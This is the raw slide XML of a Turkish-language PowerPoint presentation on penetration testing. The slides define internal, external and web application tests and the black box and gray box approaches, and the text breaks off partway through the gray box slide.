                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Penetrasyon (Sızma) Testi</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31546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58D7B84-DE83-48EB-BCC5-B2F582F3BE91}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1796922" y="216697"/>
            <a:ext cx="8948490" cy="797911"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Penetrasyon Testi Çeşitleri</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="İçerik Yer Tutucusu 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3094336-1C16-4E36-8B89-850CBADB6145}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1796921" y="1164922"/>
            <a:ext cx="8948489" cy="4772416"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>H</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>edefe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vektöre</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, simüle </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>edilecek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saldırıya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sisteme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bağlı</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olarak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üçe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ayrılır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2200" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="502920" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>İç</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Ağ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> (Internal) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Sızma</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Testi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Bu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>sızma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testi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çeşidinde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ilgili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kurumun</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içeriye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açık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sistemleri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üzerinden</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hangi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verilere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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>veya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sistemlere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erişilebileceği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sorusuna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cevap</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aranmaktadır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="2200" dirty="0">
              <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="502920" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Dış</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Ağ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> (External) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Sızma</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Testi</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dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Bu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>sızma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testi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çeşidinde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ilgili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kurumun</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dışarıya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açık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sistemleri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üzerinden</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hangi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verilere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ve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>veya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR"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sistemlere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erişilebileceği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sorusuna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cevap</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aranmaktadır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="2200" dirty="0">
              <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="502920" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Uygulama</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Sızma</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b="1" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Testi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>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Dış</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Ağ</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Sızma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Testleri</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ile</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aynı</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soruya</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cevap</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aranmaktadır</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ancak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odak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>noktamız</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>uygulamalarıdır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="150287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7CCE811-ADE2-4A17-A438-9337EEC38788}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1468592" y="112734"/>
            <a:ext cx="9189138" cy="688932"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Penetrasyon Testi Yöntemleri</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="İçerik Yer Tutucusu 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CFEA3A66-13C5-49AC-A589-45EFB93353BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1215025" y="801666"/>
            <a:ext cx="9995770" cy="5486400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="502920" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Black Box:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Bu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>yaklaşımda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başlangıçta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güvenlik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testi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yapılacak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sistemle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ilgili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bilgi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yoktur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Tamamen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bilinmeyen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ilgili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bilgi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toplanacak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testler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yapılacaktır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. Bu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>yöntemde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> test </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ekibinin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ilgili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bilgi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düzeyi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hiç</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olmadığından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yanlışlıkla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zarar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verme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ihtimalleri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>yüksektir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. Bilgi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>toplama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safhası</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oldukça</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> zaman </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>alır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="2100" dirty="0">
              <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="502920" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Gray Box:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Bu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>yaklaşımda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ilgili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bilgiler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mevcuttur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Örneğin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>; IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>adres</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listesi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sunucu</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ilgili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versiyon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bilgisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> vb. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Bilgiler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güvenlik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testi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yapacak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ekibe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önceden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sağlanır</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. Black Box </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>yaklaşımına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göre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daha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kısa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> zaman </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>alır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Kontrolü</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testi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istenen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>adresleri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> belli </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1">
                <a:latin typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>olduğundan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sistemin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istem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dışı</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zarar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görme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ihtimali</a:t>
            </a:r>
            <a:r>
